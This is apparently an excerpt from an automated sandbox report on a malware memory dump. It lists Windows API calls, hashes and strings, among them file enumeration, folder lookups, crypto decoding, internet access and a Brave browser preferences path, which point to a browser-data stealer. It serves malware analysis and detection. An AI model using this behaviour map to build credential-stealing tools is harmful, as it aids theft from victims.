                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471B7D
                                                              • lstrlen.KERNEL32(00431D64), ref: 02471B88
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471BA8
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02471BB4
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471BDD
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471BE8
                                                              • lstrlen.KERNEL32(00431D64), ref: 02471BF3
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471C13
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02471C1F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471C45
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471C50
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471C78
                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02471CAC
                                                              • StrCmpCA.SHLWAPI(?,00431D70), ref: 02471CD7
                                                              • StrCmpCA.SHLWAPI(?,00431D74), ref: 02471CF1
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471D2B
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471D62
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471D6A
                                                              • lstrlen.KERNEL32(00431D64), ref: 02471D75
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471D98
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02471DA4
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471DD0
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471DDB
                                                              • lstrlen.KERNEL32(00431D64), ref: 02471DE6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471E09
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02471E15
                                                              • lstrlen.KERNEL32(?), ref: 02471E22
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471E42
                                                              • lstrcat.KERNEL32(00000000,?), ref: 02471E50
                                                              • lstrlen.KERNEL32(00431D64), ref: 02471E5B
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471E7B
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02471E87
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471EAD
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471EB8
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471EE4
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471F47
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471F52
                                                              • lstrlen.KERNEL32(00431D64), ref: 02471F5D
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471F80
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02471F8C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471FB2
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471FBD
                                                              • lstrlen.KERNEL32(00431D64), ref: 02471FC8
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471FE8
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02471FF4
                                                              • lstrlen.KERNEL32(?), ref: 02472001
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02472021
                                                              • lstrcat.KERNEL32(00000000,?), ref: 0247202F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247205B
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024720A5
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 024720AC
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02472106
                                                              • lstrlen.KERNEL32(006389F0), ref: 02472115
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02472142
                                                              • lstrcat.KERNEL32(00000000,?), ref: 0247214A
                                                              • lstrlen.KERNEL32(00431D64), ref: 02472155
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02472175
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02472181
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024721A9
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 024721B4
                                                              • lstrlen.KERNEL32(00431D64), ref: 024721BF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024721DC
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 024721E8
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                                              • String ID:
                                                              • API String ID: 4127656590-0
                                                              • Opcode ID: 58bcd7dfca981f448704edd035e49fb4acc7a00dca7f0eefd485a99d3c8059f6
                                                              • Instruction ID: 0cf43f70e31b15f1f6947e46256f75ad1a807ac334b74be09de5ffc6982db97f
                                                              • Opcode Fuzzy Hash: 58bcd7dfca981f448704edd035e49fb4acc7a00dca7f0eefd485a99d3c8059f6
                                                              • Instruction Fuzzy Hash: AF9282719016569BDB21EF75CC88AEF77BAAF44708F04402AEC29A7350DBB4D901DFA0
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248707C
                                                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 024870AF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024870E9
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02487110
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0248711B
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02487144
                                                              • lstrlen.KERNEL32(00435320), ref: 0248715E
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02487180
                                                              • lstrcat.KERNEL32(00000000,00435320), ref: 0248718C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024871B7
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024871E7
                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0248721C
                                                              • strtok_s.MSVCRT ref: 02487249
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487284
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024872B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
                                                              • String ID: hSC
                                                              • API String ID: 922491270-3351665975
                                                              • Opcode ID: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
                                                              • Instruction ID: 8f9c243880a17aaf339edc4f03978a9a05c6273beea91e013a68e4b440da7831
                                                              • Opcode Fuzzy Hash: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
                                                              • Instruction Fuzzy Hash: 5442C374A10215ABDB21FF74CC98BAFBBB6AF44704F24541AF811A7251DBB8D901DFA0
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481ED9
                                                              • lstrlen.KERNEL32(00431D68), ref: 02481EE4
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481F06
                                                              • lstrcat.KERNEL32(00000000,00431D68), ref: 02481F12
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02481F39
                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02481F4E
                                                              • StrCmpCA.SHLWAPI(?,00431D70), ref: 02481F6E
                                                              • StrCmpCA.SHLWAPI(?,00431D74), ref: 02481F88
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481FC6
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481FF9
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02482021
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0248202C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482053
                                                              • lstrlen.KERNEL32(00431D64), ref: 02482065
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482087
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02482093
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024820BB
                                                              • lstrlen.KERNEL32(?), ref: 024820CF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024820EC
                                                              • lstrcat.KERNEL32(00000000,?), ref: 024820FA
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482120
                                                              • lstrlen.KERNEL32(00638D00), ref: 02482136
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482160
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0248216B
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482196
                                                              • lstrlen.KERNEL32(00431D64), ref: 024821A8
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024821CA
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 024821D6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024821FF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248222C
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02482237
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248225E
                                                              • lstrlen.KERNEL32(00431D64), ref: 02482270
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482292
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 0248229E
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024822C7
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024822F6
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02482301
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482328
                                                              • lstrlen.KERNEL32(00431D64), ref: 0248233A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248235C
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02482368
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482391
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024823C0
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 024823CB
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024823F4
                                                              • lstrlen.KERNEL32(00431D64), ref: 02482420
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248243D
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02482449
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248246F
                                                              • lstrlen.KERNEL32(006389A8), ref: 02482485
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024824B9
                                                              • lstrlen.KERNEL32(00431D64), ref: 024824CD
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024824EA
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 024824F6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248251C
                                                              • lstrlen.KERNEL32(00638BDC), ref: 02482532
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482566
                                                              • lstrlen.KERNEL32(00431D64), ref: 0248257A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482597
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 024825A3
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024825C9
                                                              • lstrlen.KERNEL32(00638CE8), ref: 024825DF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02482607
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02482612
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248263D
                                                              • lstrlen.KERNEL32(00431D64), ref: 0248264F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248266E
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 0248267A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248269F
                                                              • lstrlen.KERNEL32(?), ref: 024826B3
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024826D7
                                                              • lstrcat.KERNEL32(00000000,?), ref: 024826E5
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248270A
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02482746
                                                              • lstrlen.KERNEL32(00638CA4), ref: 02482755
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248277D
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02482788
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                                              • String ID:
                                                              • API String ID: 712834838-0
                                                              • Opcode ID: cc33be6ce75fcd50f2f3e77070ad771e1d50a9dd59699009f98acb36ec3c53b7
                                                              • Instruction ID: d35283c4dc681cdca6d51ec1ec8ee354b57cf0369a14d603fd0453b99d23f242
                                                              • Opcode Fuzzy Hash: cc33be6ce75fcd50f2f3e77070ad771e1d50a9dd59699009f98acb36ec3c53b7
                                                              • Instruction Fuzzy Hash: D9627C71911656ABDB21FF75CC88AEF77BAAF44708F04052AEC15A7260DBB4D901CFA0
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02476296
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024762E9
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247631C
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247634C
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02476387
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024763BA
                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 024763CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$InternetOpen
                                                              • String ID: "$------$TPC$TPC$TPC
                                                              • API String ID: 2041821634-3953685780
                                                              • Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
                                                              • Instruction ID: 2cea7d22fb72fc9ba6486fb6921672d5dc6e09a25a8fd4cb6e2b56c8a7a15514
                                                              • Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
                                                              • Instruction Fuzzy Hash: 2F5260719006569FDB20EF75DC88EEE7BBBAF44308F15442AE825AB650DB74D805CFA0
                                                              APIs
                                                              • wsprintfA.USER32 ref: 02483F43
                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02483F5A
                                                              • StrCmpCA.SHLWAPI(?,00431D70), ref: 02483F83
                                                              • StrCmpCA.SHLWAPI(?,00431D74), ref: 02483F9D
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02483FD6
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02483FFE
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02484009
                                                              • lstrlen.KERNEL32(00431D64), ref: 02484014
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02484031
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 0248403D
                                                              • lstrlen.KERNEL32(?), ref: 0248404A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248406A
                                                              • lstrcat.KERNEL32(00000000,?), ref: 02484078
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024840A1
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024840E5
                                                              • lstrlen.KERNEL32(?), ref: 024840EF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248411C
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02484127
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248414D
                                                              • lstrlen.KERNEL32(00431D64), ref: 0248415F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02484181
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 0248418D
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024841B5
                                                              • lstrlen.KERNEL32(?), ref: 024841C9
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024841E9
                                                              • lstrcat.KERNEL32(00000000,?), ref: 024841F7
                                                              • lstrlen.KERNEL32(006389F0), ref: 02484222
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02484248
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02484253
                                                              • lstrlen.KERNEL32(00638D00), ref: 02484275
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248429B
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 024842A6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024842CE
                                                              • lstrlen.KERNEL32(00431D64), ref: 024842E0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024842FF
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 0248430B
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02484331
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248435E
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02484369
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02484390
                                                              • lstrlen.KERNEL32(00431D64), ref: 024843A2
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024843C4
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 024843D0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024843F9
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02484428
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02484433
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248445A
                                                              • lstrlen.KERNEL32(00431D64), ref: 0248446C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248448E
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 0248449A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024844C3
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024844F2
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 024844FD
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02484524
                                                              • lstrlen.KERNEL32(00431D64), ref: 02484536
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02484558
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02484564
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248458C
                                                              • lstrlen.KERNEL32(?), ref: 024845A0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024845C0
                                                              • lstrcat.KERNEL32(00000000,?), ref: 024845CE
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024845F7
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02484636
                                                              • lstrlen.KERNEL32(00638CA4), ref: 02484645
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248466D
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02484678
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024846A1
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024846E5
                                                              • lstrcat.KERNEL32(00000000), ref: 024846F2
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 024848F0
                                                              • FindClose.KERNEL32(00000000), ref: 024848FF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                                              • String ID:
                                                              • API String ID: 1006159827-0
                                                              • Opcode ID: 293ed328344b4165c013f043e32d74a9a14dbec6b56df4621553222640ab2117
                                                              • Instruction ID: 890a3da49ddd3ef2636f037227d1e40cc92ccb0da915e0d8ec6938ade412a382
                                                              • Opcode Fuzzy Hash: 293ed328344b4165c013f043e32d74a9a14dbec6b56df4621553222640ab2117
                                                              • Instruction Fuzzy Hash: C5628F71911657ABDB21FF75CC88AEF77BAAF44708F04412AE815A7250DBB8D901CFA0
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487284
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024872B4
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024872E4
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487316
                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02487323
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0248732A
                                                              • StrStrA.SHLWAPI(00000000,00435350), ref: 02487341
                                                              • lstrlen.KERNEL32(00000000), ref: 0248734C
                                                              • malloc.MSVCRT ref: 02487356
                                                              • strncpy.MSVCRT ref: 02487364
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248738F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024873B6
                                                              • StrStrA.SHLWAPI(00000000,00435358), ref: 024873C9
                                                              • lstrlen.KERNEL32(00000000), ref: 024873D4
                                                              • malloc.MSVCRT ref: 024873DE
                                                              • strncpy.MSVCRT ref: 024873EC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02487417
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248743E
                                                              • StrStrA.SHLWAPI(00000000,00435360), ref: 02487451
                                                              • lstrlen.KERNEL32(00000000), ref: 0248745C
                                                              • malloc.MSVCRT ref: 02487466
                                                              • strncpy.MSVCRT ref: 02487474
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248749F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024874C6
                                                              • StrStrA.SHLWAPI(00000000,00435368), ref: 024874D9
                                                              • lstrlen.KERNEL32(00000000), ref: 024874E8
                                                              • malloc.MSVCRT ref: 024874F2
                                                              • strncpy.MSVCRT ref: 02487500
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02487530
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02487558
                                                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0248757B
                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0248758F
                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024875B0
                                                              • LocalFree.KERNEL32(00000000), ref: 024875BB
                                                              • lstrlen.KERNEL32(?), ref: 02487655
                                                              • lstrlen.KERNEL32(?), ref: 02487668
                                                              • lstrlen.KERNEL32(?), ref: 0248767B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                                              • String ID: hSC
                                                              • API String ID: 2413810636-3351665975
                                                              • Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
                                                              • Instruction ID: ce42784ef6800aa131029ae0e68935b8157b2cfd17480bedabac31523f9ab5c2
                                                              • Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
                                                              • Instruction Fuzzy Hash: BD028074A10215ABDB20FF74DC48BAEBBB6AF08704F24541AF815E7251DBB8D901DFA0
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247E02A
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247E075
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247E0B6
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247E0E6
                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0247E0F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$FileFindFirst
                                                              • String ID: \Brave\Preferences$lRC
                                                              • API String ID: 157892242-2889925444
                                                              • Opcode ID: 2ae95654697341e2d9d78368bd15d2fdfc39750d280e88d0c6b86a57977b62f0
                                                              • Instruction ID: 20990296537f758b9d7e5c136191aa761eff2938274e2c40d9acd3b843a6b52e
                                                              • Opcode Fuzzy Hash: 2ae95654697341e2d9d78368bd15d2fdfc39750d280e88d0c6b86a57977b62f0
                                                              • Instruction Fuzzy Hash: 1AB27F71B012158FDB24DF65C844BDA7BF6AF44318F1886AEE819AB351DB74E841CF90
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481869
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248188C
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02481897
                                                              • lstrlen.KERNEL32(0043526C), ref: 024818A2
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024818BF
                                                              • lstrcat.KERNEL32(00000000,0043526C), ref: 024818CB
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024818F9
                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02481913
                                                              • StrCmpCA.SHLWAPI(?,00431D70), ref: 02481932
                                                              • StrCmpCA.SHLWAPI(?,00431D74), ref: 0248194A
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481987
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024819B0
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 024819BB
                                                              • lstrlen.KERNEL32(00431D64), ref: 024819C6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024819E3
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 024819EF
                                                              • lstrlen.KERNEL32(?), ref: 024819FA
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02481A1C
                                                              • lstrcat.KERNEL32(00000000,?), ref: 02481A28
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02481A55
                                                              • StrCmpCA.SHLWAPI(?,00638C28), ref: 02481A7C
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481ABD
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481AE6
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481B1A
                                                              • StrCmpCA.SHLWAPI(?,006388A8), ref: 02481B35
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481B76
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481B9F
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481BD3
                                                              • StrCmpCA.SHLWAPI(?,00638E3C), ref: 02481BEF
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481C20
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481C49
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481C72
                                                              • StrCmpCA.SHLWAPI(?,00638938), ref: 02481C9E
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481CDF
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481D08
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481D3C
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481D8B
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481DBF
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02481DFA
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 02481E22
                                                              • FindClose.KERNEL32(00000000), ref: 02481E31
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 1346933759-0
                                                              • Opcode ID: 305c3d06416b015528e76a0012c4fbf1ceb80ae9780ebd3fdd7e611fdf6c72f7
                                                              • Instruction ID: 17cfb346535cb6512d240d8ccba00d0f7f3fcbc894b11aadf73eb3b0daa53fab
                                                              • Opcode Fuzzy Hash: 305c3d06416b015528e76a0012c4fbf1ceb80ae9780ebd3fdd7e611fdf6c72f7
                                                              • Instruction Fuzzy Hash: EA123D716103429BDB24FF39DC88AAF77E6AF44309F04492EE89997650EB74D805CFA1
                                                              APIs
                                                              • GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02496680
                                                              • GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02496699
